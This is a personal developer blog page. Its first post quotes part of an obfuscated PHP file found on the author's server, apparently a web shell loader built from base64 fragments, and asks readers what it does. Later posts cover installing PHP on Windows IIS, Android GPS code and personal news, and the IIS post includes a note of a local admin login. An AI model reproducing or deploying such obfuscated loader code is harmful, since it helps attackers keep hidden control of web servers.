URL and Link repository

Thursday, February 20, 2020

Decoding PHP Scripts that Appear Malicious

Found a file on my server with code that starts like this:

$lFyE="";
$UW='ejup'.'fa6w'.'vgnoq'.'dyhstx'.'birkz'.'c%4_l'.'m';
$KQiR=fL1zG();

// vC5WdW
/* amiddhRNJ */
Kxyg8();
$Ub=70;
$lb8GNaXS=array('3NjEwZDk2YTA5MDc5MDk0ZWVkIjsKJEdMT0JBTFNbJ2RlZmF1bHRfYWN0aW9u','J10gICAgICA9ICdTcWwnOwokR0xPQkFMU1snZGVmYXVsdF91c2VfYWpheCddICA');
$lFyE=YyG($lFyE, join('', $lb8GNaXS) );
$lFyE=YyG($lFyE,"gID0gdHJ1ZTsKJEdMT0JBTFNbJ2RlZmF1bHRfY2hhcnNldCddICAgID0gJ1dpbm");
do{
DunS();
} while (3>11);
$lFyE=YyG($lFyE,jWiEh());

Look familiar? What does it do?

Sunday, January 26, 2020

Installing and deploying Acumatica on Windows 10

Resources / Links

  • Installing PHP on Windows 10 and IIS
  • Stop Start IIS admin service
  • Start Stop Microsoft SQL server

  • Actual Text from James McCaffrey

    Installing PHP on Windows 10 and IIS

    Posted on January 26, 2017 by jamesdmccaffrey
    I’ve always liked PHP for creating dynamic Web pages. I find PHP to be much simpler than ASP.NET for some kinds of Web sites.
    However, installing PHP on a Windows machine has always been kind of a pain in the patooty. It is possible install PHP using the Microsoft Web Platform Installer, but I prefer to manually install PHP because if something
    goes wrong using the Web Installer, it’s very, very difficult to fix, but errors in a manual install are easier to track down.
    There are five basic steps to install PHP on a Windows 10 machine:
    1. Enable (if necessary) IIS on the machine, and IIS-CGI on the machine.
    2. Download and extract PHP to C:\PHP
    3. Configure the php.ini configuration file
    4. Configure IIS to handle PHP page requests
    5. Test everything
    So, here we go. My instructions are highly abbreviated and are intended for someone who has a medium amount of familiarity with Windows and IIS.
    1. Configure IIS
    Control Panel | Programs | Turn Windows features on or off
    Check Internet Information Services
    Check IIS | World Wide Web Services | Application Development Features | CGI
    OK
    01_configureiis
    2. Install the NTS (non-thread safe) 64-bit version of PHP
    Download and save onto the machine:
    http://windows.php.net/downloads/releases/php-7.x.x-nts-Win32-VC14-x64.zip
    Extract all the contents of the zip file to C:\PHP
    02_unzip_php
    Now edit the System PATH variable so IIS knows where the PHP executables are:
    Control Panel | System and Security | System | Advanced System Settings
    Environment Variables
    System Variables | Path | Edit
    New -> C:\PHP
    Acumatica Open University 03_edit_path_variable
    3. Configure the php.ini file. This is the part you’d never figure out without some help.
    Make a copy of file C:\PHP\php.ini-development and save it as C:\PHP\php.ini
    Edit file php.ini by finding the following entries, uncomment them, and change values to:
    1. fastcgi.impersonate = 1
    2. cgi.fix_pathinfo = 0
    3. cgi.force_redirect = 0
    4. open_basedir = “C:\inetpub\wwwroot”
    5. extension_dir = “ext”
    6. error_log=”php_errors.log”
    7. uncomment the 24 Windows Extensions entries:
    extension=php_bz2.dll
    extension=php_curl.dll
    extension=php_fileinfo.dll
    extension=php_ftp.dll
    extension=php_gd2.dll
    extension=php_gettext.dll
    extension=php_gmp.dll
    extension=php_intl.dll
    extension=php_imap.dll
    extension=php_interbase.dll
    extension=php_ldap.dll
    extension=php_mbstring.dll
    extension=php_exif.dll
    extension=php_mysqli.dll
    extension=php_oci8_12c.dll
    extension=php_openssl.dll
    extension=php_pdo_firebird.dll
    extension=php_pdo_mysql.dll
    extension=php_pdo_oci.dll
    extension=php_pdo_odbc.dll
    extension=php_pdo_pgsql.dll
    extension=php_pdo_sqlite.dll
    extension=php_pgsql.dll
    extension=php_shmop.dll
    Save the edited php.ini file.
    4. Configure IIS to work with PHP
    Run | inetmgr
    Handler Mappings | Add Module Mapping
    Request path: *.php
    Module: FastCgiModule (from the dropdown)
    Executable (optional): C:\PHP\php-cgi.exe
    Name: FastCGI
    OK (Yes)
    04_iis_handler_mappings
    5. Test the installation and configuration
    Launch Notepad with Administrative privleges. Create a file test.php and save it at C:\inetpub\wwwroot. The contents are (I use an image because my blog software would choke on HTML text):
    file_test_php
    Now launch a browser and navigate to
    http://localhost/test.php
    05_testing
    And hopefully it works. There’s a LOT that can go wrong, but by Googling one error at a time you should eventually be able to get a Windows 10 machine with IIS to serve up PHP Web pages.

    Blog notes:
    Server=localhost\SQLEXPRESS;Database=master;Trusted_Connection=True;
    Stop Microsoft SQL Server: SQL server 2019 connfiguration manager.
    Stop IIS | Administrative tools | IIS | Stop
    Run | inetmgr
    From a command prompt:
    Type NET STOP IISADMIN and press Enter.
    Once the service has stopped, type NET START IISADMIN and press Enter.
    Type NET START W3svc and press Enter.
    http://localhost/DFXAcumaticaDB/
    admin
    R_M_f***e

    Thursday, January 16, 2020

    Failed to parse XML in AndroidManifest.xml Message: expected start or end tag

    Got the subject error in Android Studio after using Refactor | Migrate To Android X. Upon looking at the line number referenced by this message, I saw that Android Studio was highlighting a blank area that seemed to have invalid characters. Resolved this error by backspacing through all the affected XML statements and allowing the return key to format the next line.

    Widespread Augmented Reality

    Stop looking at your phone; look through it with Widespread Augmented Reality on Google Play

    Friday, January 10, 2020

    Android code - Return to App After Turning on GPS in Settings

    Use startActivityForResult from inside a Yes/No dialog box that turns on the GPS after starting the augmented reality heads up display app at www.spideronfire.com.

    This code is inside the MainActivity that checks if the GPS is turned on. If it is, then go directly to a Splash Screen. If not, then open a Yes or No dialog and proceed to the Splash Screen if Yes. Developer comments left to illustrate how I found out the return and request codes.

    if( !locationManager.isProviderEnabled(LocationManager.GPS_PROVIDER) ) {
    final AlertDialog.Builder builder = new AlertDialog.Builder(ctx);
    builder.setTitle(R.string.gps_not_found_title); // GPS not found
    builder.setMessage(R.string.gps_not_found_message); // Want to enable?
    builder.setPositiveButton(R.string.yes, new DialogInterface.OnClickListener() {
    public void onClick(DialogInterface dialogInterface, int i) {
    //1-10-20 martin changed to startActForResult to return back to app
    Intent locset = new Intent(android.provider.Settings.ACTION_LOCATION_SOURCE_SETTINGS);
    startActivityForResult(locset, 1);
    //1-10-20 removed by martin
    // finish();
    }
    });
    builder.setNegativeButton(R.string.no, new DialogInterface.OnClickListener() {
    public void onClick(DialogInterface dialogInterface, int i) {
    //1-10=20 removed by martin
    //System.gc();
    //System.exit(0);
    finish();
    }
    });
    builder.create().show();
    }

    @Override
    protected void onActivityResult(int requestCode, int resultCode, Intent data) {
    super.onActivityResult(requestCode, resultCode, data);
    //Log.d("martin result code is ", Integer.toString(resultCode));
    if (resultCode == 0) {
    //Log.d("martin request code is ", Integer.toString(requestCode));
    switch (requestCode) {
    case 1:
    //break;
    Intent i = new Intent(this, SplashScreen.class);
    startActivity(i);
    //finish();
    }
    }
    }

    Saturday, January 4, 2020

    What came from fucking up a tech interview with Facebook

    Having decided to focus on what I already know, I disgarded learning binary search trees, which just so happened to be the coding question asked on the technical interview with Facebook. FAIL ! Oh well, moving on, I was prompted to look into its uses and ultimately how the game Doom came into existence. This led to the concept of Binary Search Partitions. Having experimented with 3d rendering back in the 90's, I instinctively knew the rendering limitations. This YouTube video explains how gave developers overcame them. https://www.youtube.com/watch?v=yTRzfKh4Tg0

    Wednesday, January 1, 2020

    Maya - Newly released single "Quicksand"

    I would normally not post something like this, but feel compelled as I was at the hospital when she was born. https://mayamuzic.com/